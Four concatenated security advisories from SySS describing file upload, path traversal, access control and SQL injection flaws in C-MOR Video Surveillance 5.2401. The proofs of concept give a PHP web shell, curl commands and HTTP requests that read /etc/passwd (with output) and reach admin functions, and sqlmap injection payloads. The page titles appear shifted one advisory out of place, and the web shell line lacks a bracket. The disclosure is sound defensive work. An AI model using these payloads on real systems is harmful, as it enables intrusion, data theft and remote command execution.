Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Unrestricted Upload of File with Dangerous   
Type (CWE-434)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45171  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper user input validation, it is possible to upload  
dangerous files, for instance PHP code, to the C-MOR system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that the  
upload functionality for backup files allows an authenticated user to  
upload arbitrary files. The only condition is that the file name  
contains the string ".cbkf".

Therefore, "webshell.cbkf.php" is considered a valid file name for  
the C-MOR web application.

Uploaded files are stored within the directory "/srv/www/backups" on  
the C-MOR system and can thus be accessed via the URL  
https://<HOST>/backup/upload_<FILENAME>.

Due to broken access control, also low-privileged authenticated users  
can use this file upload functionality (see SYSS-2024-024[3]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the upload functionality for backup files, it is possible to  
upload arbitrary PHP code, for instance a simple PHP web shell such  
as the following one, in a file named "webshell.cbkf.php":

<?php echo system($_GET['cmd'); ?>

After a successful file upload, the uploaded PHP web shell can be  
accessed and used via the following URL, leading to OS command  
execution:

https://<HOST>/backup/upload_webshell.cbkf.php?cmd=<COMMAND>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-026

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt  
[3] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Remote Shell Upload

C-MOR Video Surveillance version 5.2401 suffers from a path traversal vulnerability.

Advisory ID:               SYSS-2024-025  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Relative Path Traversal (CWE-23)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45178  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper user input validation, it is possible to download  
arbitrary files from the C-MOR system via a path traversal attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionalities are vulnerable to path traversal attacks, which is  
due to insufficient user input validation.

For instance, the download functionality for backups provided by the  
script "download-bkf.pml" is vulnerable to a path traversal  
attack via the parameter "bkf".

This enables an authenticated user to download arbitrary files as  
Linux user "www-data" from the C-MOR system.

Another path traversal attack is in the script "show-movies.pml",  
which can be exploited via the parameter "cam".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following HTTP POST request with the relative path  
"../../../../etc/passwd" as value for the parameter "bkf", it is  
possible to download the file "/etc/passwd":

POST /download-bkf.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 26

bkf=../../../../etc/passwd

An example of a successful path traversal attack is demonstrated via  
the following curl command:

$ curl -X POST -d 'bkf=../../../../etc/passwd' --user   
'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH'   
https://<HOST>/download-bkf.pml  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
Debian-exim:x:101:103::/var/spool/exim4:/bin/false  
statd:x:102:65534::/var/lib/nfs:/bin/false  
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin  
cam:x:1000:1000:Cam,,,:/home/cam:/bin/bash  
postfix:x:104:107::/var/spool/postfix:/bin/false  
stunnel4:x:105:109::/var/run/stunnel4:/bin/false  
mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false  
messagebus:x:107:113::/var/run/dbus:/bin/false  
ntp:x:108:114::/home/ntp:/bin/false  
download:x:1002:1002:Download User:/home/download:/bin/bash

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-025

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Path Traversal

C-MOR Video Surveillance version 5.2401 suffers from an improper access control privilege escalation vulnerability that allows for a lower privileged user to access administrative functions.

Advisory ID:               SYSS-2024-024  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Improper Access Control (CWE-284)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45170  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper or missing access control, low-privileged users can  
use administrative functions of the C-MOR web interface.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functions are only available to administrative users.

However, access to those functions is restricted via the web application  
user interface and not checked on the server side.

Thus, by sending corresponding HTTP requests to the web server of the  
C-MOR web interface, low-privileged users can also use administrative  
functionality, for instance downloading backup files or changing  
configuration settings.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

In this example, a low-privileged user downloads backup files by  
directly sending a corresponding HTTP POST request to the page  
"download-bkf.pml".

For this, the following HTML code can be used:

<html>  
     <body>  
         <form action="https://<HOST>/download-bkf.pml" method="POST">  
             <input type="text" name="bkf" value="" placeholder="Please   
insert the file name." /><br>  
             <input type="submit" value="Download">  
         </form>  
     </body>  
</html>

This PoC attack can also be performed using the following curl command:

curl -X POST -d '<FILENAME>' --user '<USERNAME:PASSWORD>' --ciphers   
'DEFAULT:!DH' https://<HOST>/download-bkf.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Improper Access Control

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a remote SQL injection vulnerability.

Advisory ID:               SYSS-2024-023  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        SQL Injection (CWE-89)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45174  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper validation of user-supplied data, different  
functionalities of the C-MOR web interface are vulnerable to SQL  
injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
provided functionalities of the C-MOR web interface are vulnerable  
to SQL injection attacks.

These kinds of attacks allow an authenticated user to execute arbitrary  
SQL commands in the context of the corresponding MySQL database.

In the following pages, SQL injection vulnerabilities were found:

* list-timelapse.plm (URL parameter: "cam")  
* list-motion.plm (URL parameter "cam")  
* show-movies.plm (URL parameter "cam")

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the software tool sqlmap[4], the SQL injection vulnerabilities  
via the URL parameter "cam" could be easily exploited, as the following  
output exemplarily illustrates:

(...)  
sqlmap resumed the following injection point(s) from stored session:  
- ---  
Parameter: cam (GET)  
     Type: error-based  
     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or   
GROUP BY clause (FLOOR)  
     Payload: days=1100&cam=cam1 AND (SELECT 2483 FROM(SELECT   
COUNT(*),CONCAT(0x717a707071,(SELECT   
(ELT(2483=2483,1))),0x717a707871,FLOOR(RAND(0)*2))x FROM   
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

     Type: time-based blind  
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
     Payload: days=1100&cam=cam1 AND (SELECT 9790 FROM   
(SELECT(SLEEP(5)))Yfcf)  
- ---  
[17:16:12] [INFO] the back-end DBMS is MySQL  
[17:16:12] [INFO] fetching banner  
[17:16:12] [INFO] resumed: '5.1.66-0+squeeze1'  
web application technology: Apache  
back-end DBMS: MySQL >= 5.0  
banner: '5.1.66-0+squeeze1'  
(...)

By exploiting the SQL injection vulnerabilities, the MySQL database  
could be accessed and dumped as database user "cam".

In version 6.00PL01, some SQL injection attack instances were fixed.  
However, others could still be found, for example via the URL  
parameter "c" on the page getpic.pml.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in  
the newly released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-023

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-023.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/  
[4] sqlmap GitHub repository  
     https://github.com/sqlmapproject/sqlmap

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Tag

#web